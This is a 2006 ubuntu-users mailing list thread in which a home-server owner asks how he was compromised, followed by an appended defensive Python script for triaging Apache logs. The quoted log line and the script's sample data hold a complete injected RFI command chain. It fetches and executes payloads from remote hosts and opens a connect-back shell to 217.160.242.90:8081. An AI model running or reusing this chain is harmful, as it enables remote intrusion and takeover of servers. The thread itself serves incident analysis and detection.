My home desktop was compromised, but how?

Michael J. Lynch mlynch at gcom.com
Tue Feb 28 21:31:25 UTC 2006


Carthik Sharma wrote:
> Hi,
> 
> I run an Apache and SSH server from my home computer. I have not
> installed any PHP scripts whatsoever. All there are are text files
> and the odd HTML file.
> 
> Somebody seems to have hacked into my desktop/server. I find files in
> the /tmp/ directory (like "agent.8213") which I cannot open; these are
> setuid-ed -- how do I open these?
> 
> In my apache access logs, there are things like
> "http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|"
> 
> That above is a valid URL, and will take you to a script to deface
> someone's PHP script etc., I suppose. Now, how did this malicious
> hacker get into my computer?
> 
> (The full line is:
> 192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" )
> How would I go about tracing how this incident happened?
> 
> Any server/security admins here that can help me with a little
> patience? I really want to get to the root of this and find out why
> whatever happened happened.
> 
> None of the passwords for the ssh accounts are dictionary words, in
> fact all are combinations of letters, numbers and sometimes special
> symbols.
> 
> I have done nothing special to modify Apache or the SSH daemon; in
> fact, sshd listens on port 8888.
> 
> I could paste logs here, but they would be too long. For now, I have
> stopped the apache and ssh servers.
> 
> Any help will be most welcome. My security bubble just burst :(
> 
> Carthik.
> 

I'm not sure how you'd go about tracing down what happened, but my guess
is that it came in with a webpage.  It clearly looks to be an attempt to
break into your machine, as the *dc.txt* file it downloaded is a Perl
script that looks to me like it attempts to connect an interactive shell
to a remote server of some sort.  I believe this to be malicious because
the script redirects the shell history to /dev/null to hide what was
done.

You mention you are running a web server.  One of the IP addresses
embedded in the long string is the address of a name server at a web
development company.  Are you using such a service?

I don't know if any of this will help, but I hope so.

-- 
Michael J. Lynch

What if the hokey pokey IS what it's all about -- author unknown
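The original question asks how to trace what happened from the logs. As an added example, not code from either poster, here is a Python triage script that parses Apache access-log lines in the "combined" format and pulls apart requests like the one quoted above. It flags any query parameter whose value is itself a remote URL (the mosConfig_absolute_path=http://... pattern, where a parameter meant to hold a local path is pointed at another server), splits the injected cmd chain into its individual commands, labels each as download, chmod or execute, and collects the IP addresses involved plus the host and port the executed payload is handed as arguments. It also reports the HTTP status, because the quoted line returned 404 and the status of each matching request is worth checking alongside the payload. The first sample line is the request from the post re-joined onto one line; the second is a constructed benign request for contrast. The log format, the tool name lists and the heuristic that "IP PORT" arguments to an executed payload name a connect-back target are assumptions of the example, not facts from the thread.

```python
"""Triage Apache access-log entries for remote-file-inclusion (RFI) attempts.

Added example, not code from the mailing-list thread. Assumes the Apache
"combined" log format. For each logged request it reports: query parameters
whose value is a remote URL, the commands carried in a `cmd` parameter, what
those commands do, the remote IPs mentioned, and any "IP PORT" connect-back
target handed to an executed payload.
"""
import re
from urllib.parse import unquote

# Apache "combined" format (assumed):
# host ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)
RFI_RE = re.compile(r'^(?:https?|ftp)://', re.I)      # parameter value is a remote URL
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
CALLBACK_RE = re.compile(r'((?:\d{1,3}\.){3}\d{1,3})\s+(\d{2,5})\b')  # "IP PORT" arguments

DOWNLOAD_TOOLS = {"wget", "curl", "fetch", "lwp-download"}  # assumed list
INTERPRETERS = {"perl", "python", "sh", "bash"}             # assumed list


def decode_params(target):
    """Split the query string on '&' only (';' is a shell separator inside the
    payload, not a parameter separator) and percent-decode names and values."""
    _, _, query = target.partition("?")
    params = []
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params.append((unquote(name), unquote(value)))
    return params


def classify(cmd):
    """Coarse label for one shell command taken from an injected chain."""
    tokens = cmd.split()
    if not tokens:
        return None
    head = tokens[0]
    if head in DOWNLOAD_TOOLS:
        return "download"
    if head == "chmod":
        return "make-executable"
    if head in INTERPRETERS or head.startswith("./"):
        return "execute"
    return None


def triage(line):
    """Return a report dict for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    params = decode_params(rec["target"])
    rfi_params = [(k, v) for k, v in params if RFI_RE.match(v)]
    commands = []
    for k, v in params:
        if k == "cmd":
            commands.extend(c.strip() for c in v.split(";") if c.strip())
    tactics = sorted({t for t in map(classify, commands) if t})
    # Heuristic: an executed payload given "IP PORT" as arguments is being told
    # where to connect back to. Those are the addresses to look for in firewall logs.
    callbacks = sorted({(ip, int(port))
                        for c in commands if classify(c) == "execute"
                        for ip, port in CALLBACK_RE.findall(c)})
    remote_hosts = sorted(set(IPV4_RE.findall(unquote(rec["target"]))) - {rec["host"]})
    return {
        "client": rec["host"], "time": rec["time"], "status": int(rec["status"]),
        "rfi_params": rfi_params, "commands": commands, "tactics": tactics,
        "callbacks": callbacks, "remote_hosts": remote_hosts,
    }


def is_suspicious(report):
    """A request is flagged if any parameter is a remote URL or a command chain was found."""
    return bool(report and (report["rfi_params"] or report["tactics"]))


SAMPLE_LOGS = [
    # The request from the post, re-joined onto one line.
    '192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo| HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    # Constructed benign request, for contrast.
    '192.168.0.10 - - [26/Feb/2006:15:02:11 -0500] "GET /notes/todo.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        r = triage(line)
        flag = "SUSPICIOUS" if is_suspicious(r) else "ok"
        print(f"{flag}: client={r['client']} status={r['status']} tactics={r['tactics']} "
              f"callbacks={r['callbacks']} hosts={r['remote_hosts']}")
```

Run it over a whole access log with a loop that feeds each line to triage() and prints the flagged ones. The remote_hosts and callbacks fields are the addresses to search for next in any firewall or connection logs, and the status field separates requests that reached a real script from ones that only probed for it.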
More information about the ubuntu-users mailing list